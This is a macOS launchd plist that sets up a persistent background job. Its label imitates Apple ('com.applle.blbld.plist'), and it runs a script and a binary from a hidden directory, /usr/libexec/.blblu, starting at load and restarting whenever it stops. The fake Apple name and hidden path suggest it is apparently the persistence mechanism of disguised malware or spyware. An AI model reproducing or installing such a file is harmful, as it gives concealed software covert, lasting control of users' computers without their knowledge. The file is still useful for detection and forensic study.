<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>EnableTransactions</key>
	<true/>
	<key>KeepAlive</key>
	<true/>
	<key>Label</key>
	<string>com.applle.blbld.plist</string>
	<key>Nice</key>
	<integer>10</integer>
	<key>ProgramArguments</key>
	<array>
		<string>/usr/libexec/.blblu/blblu/Contents/Resources/Launch.sh</string>
		<string>/usr/libexec/.blblu/blblu/Contents/MacOS/blblu</string>
		<string>blblu</string>
		<string>blblu-load-all</string>
	</array>
	<key>RunAtLoad</key>
	<true/>
</dict>
</plist>
